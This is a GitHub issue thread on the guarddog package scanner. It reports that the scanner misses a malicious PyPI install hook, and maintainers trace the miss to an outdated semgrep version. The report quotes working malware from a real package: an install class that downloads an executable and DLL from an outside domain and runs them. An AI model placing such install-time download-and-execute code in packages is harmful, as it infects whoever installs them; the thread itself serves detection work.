### ISSUE TITLE
Identify new malicious pypi packages

### ISSUE THREAD

**Issue by jxdv** [DataDog/guarddog#306]
Sources:
https://malware.news/t/attackers-leverage-pypi-to-sideload-malicious-dlls/78939
https://thehackernews.com/2024/02/new-malicious-pypi-packages-caught.html
https://www.infosecurity-magazine.com/news/typosquatting-repojacking-tactics/

Ran guarddog locally on this code snippet and didn't get any malicious indicators:
```python3
class ActionOnInstall(install):
    def run(self):
        import os, tempfile
        from urllib.request import Request, urlopen
        temp_dir = tempfile.mkdtemp(prefix="DriverGenius")
        dname = temp_dir
        def dfile(url):
            requestObj = Request(url, headers={'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; rv:97.0) Gecko/20100101 Firefox/97.0'}
            responseObj = urlopen(requestObj)
            content = responseObj.read()
            return content
        r = dfile("https://fus.rngupdatem.buzz/c.exe")
        rd = dfile("https://fus.rngupdatem.buzz/dgdeskband64.dll")
        with open(dname+"\\ComServer.exe",'wb') as f:
            f.write(r)
        with open(dname+"\\dgdeskband64.dll",'wb') as f:
            f.write(rd)
        os.system("START " +dname+"\\ComServer.exe showdeskband")
```

**Comment by christophetd** [comment]
Thanks for reporting! We'll have a look shortly

**Comment by cedricvanrompay-datadog** [comment]
Could this be the same as inhttps://github.com/DataDog/guarddog/issues/311?

GuardDog currently does not scan files other than `setup.py` for code execution.

**Comment by jxdv** [comment]
> Could this be the same as in #311?
> 
> GuardDog currently does not scan files other than `setup.py` for code execution.

FYI GuardDog doesn't detect this code snippet even if you put it in `setup.py`

1. mkdir test_dir/ && cd test_dir/
2. echo <chunk_of_code_from_description> >> setup.py
3. cd ../ && tar -cvzf test_dir.tar.gz test_dir/
4. guarddog pypi scan test_dir.tar.gz
5. `Found 0 potentially malicious indicators scanning test_dir.tar.gz`

**Comment by sobregosodd** [comment]
I validated that this doesn't get detected by Guarddog not even in setup.py.
However, the rule works as expected using last semgrep version, 
We're running an old one `1.112.1` because of a bug involving [one of our rules](https://github.com/semgrep/semgrep/issues/6631)

I created this [PR](https://github.com/DataDog/guarddog/pull/322) that fixes our rule syntax thus allowing us to use the latest one.
